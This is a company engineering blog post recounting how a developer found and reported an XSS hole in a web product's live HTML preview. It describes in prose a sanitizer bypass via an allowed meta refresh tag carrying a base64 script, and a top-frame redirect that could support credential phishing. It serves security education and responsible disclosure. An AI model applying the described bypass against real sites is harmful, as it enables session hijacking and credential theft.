The war on security bugs

Vályi Péter
Emarsys Craftlab
Published in
5 min readJun 16, 2021

--

At Emarsys, we pay huge attention to keep our customers’ data safe. Our uncommonly attractive security team constantly keeps its eyes on application security, makes efforts to proactively prevent data breaches, investigates attacks and the list goes on. In this post, I’d like to tell you a bit about how we approach security in the company and share the story of how I caught a bug in our system.

As we are a company in a highly dynamic market, and with more than 200 developers working simultaneously, things tend to happen quite fast and the rate of new code produced is enormous. It is virtually impossible for one team to oversee and control every piece of new code before it is released to production. Hence, they emphasise that each and every developer should have security in mind when developing new features. That’s why we have internal hands-on web security workshops — where developers learn about various security vulnerabilities, sql injection, XSS, XXE and so on, and try to use this knowledge to catch bugs in time. Also, they provide guidelines, checklists and various other materials to help prevent security issues.

This is a battle where all of us have to grab a sword, and tackle these sneaky bugs head-on. This is not an easy task. Especially if you are accustomed to have this part of the work outsourced to external security firms — which was the common way of doing things during my previous jobs. As we were mostly using the waterfall model, this is what we did: at some point in time before the release, the software was made available to the security firm. They analyzed the source code, made several penetration tests and returned a report to us with their findings. Then we fixed these security holes, and hopefully learned not to create them in the first place the next time.

The issue with this workflow is that we didn’t really stop development after the security checkup. There were always new features added later, bugs fixed, and so on. What about the new security issues introduced in these additions? We never had them checked. In the age of continuous delivery this is not a sustainable method. It is safer and more effective to look for security issues and eliminate them in every single commit.

For me personally, this meant looking at development from a different perspective. Usually, what I’d been focusing on is how to make things work. I had to incorporate the opposite; how to make things break, how to bend things to do something different than the intended purpose.

Enemy spotted

Our team is developing a product called Web Channel which allows our customers to simply enrich their websites with custom html content. One day, we started working on a shiny new feature. This would allow the users to see a live preview of the html content being edited. The preview would be shown next to the code, right on the page. For this, we would use a new UI component that had the preview functionality.

On the left side: the html source, on the right side: the live preview

I thought to myself: this is exactly the place where nasty things can happen. Could I maybe add some code to the html so that the preview would evaluate it? If it does, it would be a perfect place for XSS. Let’s try it out quickly!

No luck of course, it’s not that easy! Let’s try some different tricks:

There are lots of techniques like these ones. I tried a couple of them, but no luck. It was time to investigate further what was happening behind the scenes, and try to come up with more specific attacks. I looked at the html generated in the preview:

Sanitized code in the preview

It seems that the injected onerror code was completely removed. They must have used some kind of html sanitization to achieve this. Also, I noticed that the preview lives in an iframe — but let’s talk about that later. I started to dig deeper in the source code.

Gathering intel

The preview component seems to use a 3rd party html sanitizer called DomPurify. It parses the input html and removes any malicious code. The clean html is then inserted to the DOM. Seems like a tough nut to crack. But I still had some directions to go from here:

  • what if DomPurify is used or configured incorrectly?
  • what if DomPurify itself has a vulnerability?
  • what if a bug was fixed in DomPurify, but we use an earlier version of it?
  • is there any way to bypass the sanitization (maybe a forgotten feature switch?)

It seems that there is an interesting bit of configuration that is being used by the component:

Some tags are explicitly added to the configuration. This means, that although DomPurify will sanitize these tags, but they won’t be completely removed. What especially caught my attention is the meta html tag. Could I inject code into it? After some googling, it seems that it indeed is possible:

Basically this causes the browser to refresh, but instead of loading a url, the content attribute’s value will be rendered to the page. It is a base64-encoded version of this snippet:

And it ran successfully! The code was executed where it wasn’t supposed to. This is a success in itself, but can someone really exploit this fact? Can it actually cause harm?

Victims of the war

As I wrote earlier, the preview lives inside an iframe. More specifically, a cross-origin iframe that has no sandbox attribute present. To do malicious things the script would need to access the top frame (the parent frame). In modern, secure browsers the top frame is pretty much protected from any kind of meddling, but there are exceptions. I found out that this snippet worked in Firefox:

So this way, I could redirect the potential victims to an arbitrary webpage. That was indeed “good news” for me, as I could now do anything to the users. For example, I could create a page that mimics the login page, and steal credentials, which must be a common way to exploit this kind of vulnerability.

Fighting back

This was the story of how I found a security vulnerability in our system. What’s the next step? Obviously I had to fight back, in other words, it was time to eliminate the bug. I informed the security team of my findings and the team developing the preview component. I detailed the steps for easy reproduction and made suggestions on how to remove the bug. It was soon fixed.

The moral of the story: it is our duty as developers to have a security mindset when we code. We should educate and train ourselves to be able to spot security bugs early on. For some, this might mean they have to change their usual perspective. Let’s fight back!

--

--